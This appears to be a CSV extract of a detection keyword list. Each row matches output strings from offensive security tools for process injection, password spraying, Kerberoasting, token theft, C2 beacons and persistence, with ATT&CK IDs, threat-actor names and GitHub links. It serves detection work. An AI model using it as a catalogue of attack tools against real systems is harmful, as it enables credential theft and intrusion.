"*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","20041"
"*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","20042"
"*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20043"
"*] Injecting remote shellcode*",".{0,1000}\]\sInjecting\sremote\sshellcode.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","20044"
"*] Kerberoast user * successfully!*",".{0,1000}\]\sKerberoast\suser\s.{0,1000}\ssuccessfully!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","20045"
"*] Killing EventLog Threads (if running)*",".{0,1000}\]\sKilling\sEventLog\sThreads\s\(if\srunning\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","20046"
"*] Leak of complete Priv token successful!*",".{0,1000}\]\sLeak\sof\scomplete\sPriv\stoken\ssuccessful!.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","20047"
"*] Listing all vulnerabilities scanned by Moriarty*",".{0,1000}\]\sListing\sall\svulnerabilities\sscanned\sby\sMoriarty.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","20048"
"*] Listing GraphRunner modules?*",".{0,1000}\]\sListing\sGraphRunner\smodules\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","20049"
"*] LLMNR sniffer identified potential spoofing target:*",".{0,1000}\]\sLLMNR\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20050"
"*] LLMNR Sniffer identified previously sniffed name*",".{0,1000}\]\sLLMNR\sSniffer\sidentified\spreviously\ssniffed\sname.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20051"
"*] Modifying * attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\s.{0,1000}\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20053"
"*] Modifying gPCFileSysPath attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\sgPCFileSysPath\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20054"
"*] Now spraying EAS portal at https://*/Microsoft-Server-ActiveSync*",".{0,1000}\]\sNow\sspraying\sEAS\sportal\sat\shttps\:\/\/.{0,1000}\/Microsoft\-Server\-ActiveSync.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","20055"
"*] Number of available credentials: %zu*",".{0,1000}\]\sNumber\sof\savailable\scredentials\:\s\%zu.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","20056"
"*] Password spraying has begun with *",".{0,1000}\]\sPassword\sspraying\shas\sbegun\swith\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","20057"
"*] Password spraying is complete*",".{0,1000}\]\sPassword\sspraying\sis\scomplete.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","20058"
"*] Powershell Persistence created*",".{0,1000}\]\sPowershell\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20059"
"*] QueueUserAPC Inject shellcode completed, enjoy!*",".{0,1000}\]\sQueueUserAPC\sInject\sshellcode\scompleted,\senjoy!.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#content","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","20060"
"*] Received DCOM NTLM type 3 authentication from the privileged client*",".{0,1000}\]\sReceived\sDCOM\sNTLM\stype\s3\sauthentication\sfrom\sthe\sprivileged\sclient.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","20061"
"*] Received RCON challenge: *",".{0,1000}\]\sReceived\sRCON\schallenge\:\s.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#content","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","20062"
"*] Retrieving the S4U2Self referral from *",".{0,1000}\]\sRetrieving\sthe\sS4U2Self\sreferral\sfrom\s.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20064"
"*] Roasted hashes written to : *",".{0,1000}\]\sRoasted\shashes\swritten\sto\s\:\s.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20065"
"*] Screensaver Persistence created*",".{0,1000}\]\sScreensaver\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20067"
"*] Sending credentials to pastebin ..*",".{0,1000}\]\sSending\scredentials\sto\spastebin\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20068"
"*] sending network-based smb hypertrojan with credentials*",".{0,1000}\]\ssending\snetwork\-based\ssmb\shypertrojan\swith\scredentials.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20069"
"*] Sending S4U2proxy request *",".{0,1000}\]\sSending\sS4U2proxy\srequest\s.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20070"
"*] Shellcode Decryption Started*",".{0,1000}\]\sShellcode\sDecryption\sStarted.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","20071"
"*] Spoofing gPLink to *",".{0,1000}\]\sSpoofing\sgPLink\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20072"
"*] Starting admin grpc server on port: *",".{0,1000}\]\sStarting\sadmin\sgrpc\sserver\son\sport\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","20073"
"*] Starting agent node actively.Connecting to *Reconnecting every * seconds*",".{0,1000}\]\sStarting\sagent\snode\sactively\.Connecting\sto\s.{0,1000}Reconnecting\severy\s.{0,1000}\sseconds.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","20074"
"*] Starting client grpc server on port: *",".{0,1000}\]\sStarting\sclient\sgrpc\sserver\son\sport\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","20075"
"*] Starting GraphSpy. Open in your browser by going to the url displayed below.*",".{0,1000}\]\sStarting\sGraphSpy\.\sOpen\sin\syour\sbrowser\sby\sgoing\sto\sthe\surl\sdisplayed\sbelow\..{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","20076"
"*] Starting nullinux setup script*",".{0,1000}\]\sStarting\snullinux\ssetup\sscript.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux #content","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","20077"
"*] Starting RogueOxidResolver RPC Server listening on port*",".{0,1000}\]\sStarting\sRogueOxidResolver\sRPC\sServer\slistening\son\sport.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","20078"
"*] Starting share enumeration with thread limit of *",".{0,1000}\]\sStarting\sshare\senumeration\swith\sthread\slimit\sof\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","20079"
"*] Starting the NTLM relay attack, launch ntlmrelayx on *",".{0,1000}\]\sStarting\sthe\sNTLM\srelay\sattack,\slaunch\sntlmrelayx\son\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","20080"
"*] Starting the RPC server to capture the credentials hash from the user authentication!!*",".{0,1000}\]\sStarting\sthe\sRPC\sserver\sto\scapture\sthe\scredentials\shash\sfrom\sthe\suser\sauthentication!!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","20081"
"*] Startup Persistence created*",".{0,1000}\]\sStartup\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20082"
"*] Stopping LLMNR spoofing""*",".{0,1000}\]\sStopping\sLLMNR\sspoofing\"".{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","20083"
"*] TARGET DLL IS NOT VULNERABLE TO *",".{0,1000}\]\sTARGET\sDLL\sIS\sNOT\sVULNERABLE\sTO\s.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","20084"
"*] TeamFiltration V3.5.3 PUBLIC*",".{0,1000}\]\sTeamFiltration\sV3\.5\.3\sPUBLIC.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","20085"
"*] to download void.zip using BitsTransfer*",".{0,1000}\]\sto\sdownload\svoid\.zip\susing\sBitsTransfer.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20086"
"*] Token does NOT have SE_ASSIGN_PRIMARY_NAME* using CreateProcessAsWithToken() for launching:*",".{0,1000}\]\sToken\sdoes\sNOT\shave\sSE_ASSIGN_PRIMARY_NAME.{0,1000}\susing\sCreateProcessAsWithToken\(\)\sfor\slaunching\:.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","20087"
"*] Triage SCCM Secrets*",".{0,1000}\]\sTriage\sSCCM\sSecrets.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","20088"
"*] Triggered Meterpreter oneliner on *",".{0,1000}\]\sTriggered\sMeterpreter\soneliner\son\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","20089"
"*] use the aes key from the beacon's online info to encrypt transfer data (base64 format*",".{0,1000}\]\suse\sthe\saes\skey\sfrom\sthe\sbeacon\'s\sonline\sinfo\sto\sencrypt\stransfer\sdata\s\(base64\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","20090"
"*] use the public key from .beacon_keys to decrypt the beacon's online info*",".{0,1000}\]\suse\sthe\spublic\skey\sfrom\s\.beacon_keys\sto\sdecrypt\sthe\sbeacon\'s\sonline\sinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","20091"
"*] User can impersonate the following logins: *",".{0,1000}\]\sUser\scan\simpersonate\sthe\sfollowing\slogins\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","20092"
"*] UserInitMprLogonScript Persistence created*",".{0,1000}\]\sUserInitMprLogonScript\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20093"
